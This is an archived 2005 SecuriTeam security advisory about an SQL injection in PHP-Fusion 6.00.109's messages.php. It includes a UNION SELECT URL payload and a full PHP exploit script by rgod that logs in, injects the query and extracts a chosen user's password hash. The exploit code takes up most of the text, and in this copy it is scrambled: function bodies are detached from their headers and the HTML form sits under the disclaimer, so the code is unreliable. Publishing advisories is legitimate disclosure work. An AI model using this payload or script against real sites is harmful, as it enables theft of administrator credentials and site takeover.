[UNIX] PHP-Fusion msg_send SQL Injection
From: SecuriTeam (support_at_securiteam.com)
Date: 09/29/05
- Previous message: SecuriTeam: "[NT] AntiVirus Filename Bypassing"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 29 Sep 2005 10:36:57 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PHP-Fusion msg_send SQL Injection
------------------------------------------------------------------------
SUMMARY
<http://www.php-fusion.co.uk/> PHP-Fusion - "A light-weight open-source
content management system (CMS) written in PHP. It utilizes a MySQL
database to store your site content and includes a simple, comprehensive
administration system."
An SQL Injection vulnerability has been discovered in PHP-Fusion's
messages.php script.
DETAILS
Vulnerable Systems:
* PHP-Fusion version 6.00.109
If magic_quotes set to off, PHP-Fusion vulnerable to SQL Injection.
Example:
http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT
user_password FROM fusion_users WHERE user_name='[admin_username]'/*
Now hash will be showed in "To:" field when you post a private message.
Exploit:
<?php
# 19.17 28/09/2005 #
# #
# -- PhpF6_00_109xpl.php #
# #
# PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure
#
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# mphhh, private messages again...tze,tze #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# go! #
# #
# Sun-Tzu: "Therefore the clever combatant imposes his will on the enemy,
#
# but does not allow the enemy's will to be imposed on him" #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<head><title> *** PHP-Fusion v6.00.109 SQL Injection *** </title>
function show($headeri)
for ($li=$ci*16; $li<=strlen($headeri); $li++)
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket()
if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and
#STEP 1 -> login, to retrieve a session cookie...
$data="user_name=".urlencode(trim($user)).
$packet="Referer: http://".$host.$path."/news.php\r\n";
# STEP 2 -> SQL Injection, now retrieve the MD5 password hash from
if ($proxy=='')
$packet.="User-Agent: GameBoy, Powered by Nintendo\r\n";
}
?>
ADDITIONAL INFORMATION
The information has been provided by <mailto:retrogod@aliceposta.it>
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
<meta
http-equiv= "Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"><!-- body,td,th {color:#00FF00;} body{background-color:
#000000;}
Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size:
10px; }
Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:
bold;
font-style: italic; } --> </style></head><body> <p class="Stile6">
Php-Fusion v6.
00.109 SQL Injection / admin|user credentials disclosure </p><p
class="Stile6">
a script by rgod at <a href="http://rgod.altervista.org" target="_blank">
http://rgod.altervista.org></p><table width="84%"><tr><td width="43%">
<form
name="form1" method="post"
action="'.$SERVER[PHP_SELF].'?path=value&host=value
&port=value&proxy=value&user=value&pass=value&username=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname ( ex:
www.sitename.com )
</span></p> <p> <input type="text" name="path"><span class="Stile5"> path
(ex:
/phpfusion/ or just /)</span></p><p> <input type="text" name="port"> <span
class="Stile5">specify a port other than 80 (default value)</span></p><p>
<input
type="text" name="user"> <span class="Stile5">your username </span> </p>
<p>
<input type="text" name="pass"> <span class="Stile5">your password ( to
get a
valid session cookie) </span></p><p><input type="text" name="username">
<span
class="Stile5">user whom you want the password </span></p><p><input
type="text"
name="proxy"> <span class="Stile5"> send exploit trough an HTTP proxy
</span>
</p> <p> <input type="submit"name="Submit" value="go!"> </p></form> </td>
</tr>
</table></body></html>';
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
{
global $proxy, $host, $port, $html, $packet;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,2048);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
($username<>''))
{
if ($port=='') {$port=80;}
"&user_pass=".urlencode(trim($pass))."&login=Login";
if ($proxy=='')
{$packet="POST ".$path."news.php HTTP/1.1\r\n";}
else
{$packet="POST http://".$host.$path."news.php HTTP/1.1\r\n";}
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: fusion_visited=yes;
PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0];
echo '<br>Your cookie: '.htmlentities($cookie);
database
$username=str_replace("'","",$username);
$sql="' UNION SELECT user_password FROM fusion_users WHERE
user_name='".trim($username)."'/*";
{$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)."
HTTP/1.1\r\n";}
else
{$packet="GET
http://".$host.$path."messages.php?msg_send=".urlencode($sql)."
HTTP/1.1\r\n";}
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6,
*;q=0.1\r\n";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Cookie2: \$Version=1\r\n";
$packet.="Connection: Keep-Alive, TE\r\n";
$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n";
show($packet);
sendpacket($packet);
if (eregi('For Members only',$html)) {echo 'You have to specify a valid
session cookie...'; die; }
$temp=explode("'Click to view the senders profile'>",$html);
$temp2=explode("</a>",$temp[1]);
$hash=$temp2[0];
echo '<br>Username: '.htmlentities($username).' Password hash: '.$hash;
else
{ echo '<br> Fill requested fields, optionally specify a proxy...';}
rgod.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... allow attackers to cause symbolic
link attacks to create arbitrary files ... 17 echo "quit">>$tmp ... They
are 2 vulnerabilities, symlink attack and password ... (Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Claroline Remote Code Execution
... echo "by rgod rgod at autistici.org\r\n"; ... (Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in myBloggie
allows remote attackers ... echo "administrative credentials disclosure exploit\n"; ...
echo 'No response from '.$host.':'.$port; die; ... (Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lotus Domino WebMail, with
"Generate HTML for all fields" enabled stores ... (Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... privileges and execute arbitrary
code using Qpopper poppassd. ... echo "FreeBSD Qpopper poppassd latest version local
r00t exploit by kcope" ... cat> program.c << _EOF ... (Securiteam)
